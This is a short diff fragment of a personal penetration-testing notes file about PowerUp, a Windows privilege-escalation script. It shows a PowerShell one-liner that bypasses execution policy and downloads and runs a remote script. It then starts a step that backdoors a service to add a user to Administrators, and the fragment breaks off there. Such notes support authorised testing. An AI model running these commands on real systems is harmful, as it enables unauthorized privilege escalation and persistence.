bik3te/myPortableKB/tools/PowerUp.md

 C:\> powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://github.com/PowerShellMafia/PowerSploit/raw/master/Privesc/PowerUp.ps1'); Invoke-AllChecks"
 ```

+If you get errors or issues, do not forget to also check [PowerShellery](../guidelines/internal/PowerShellery.md)...

 ## Pwning
 ### Service executable permission or unquoted service path issues
 1. Backup the service and create a backdoored one which will add <user> to the localgroup Administrators: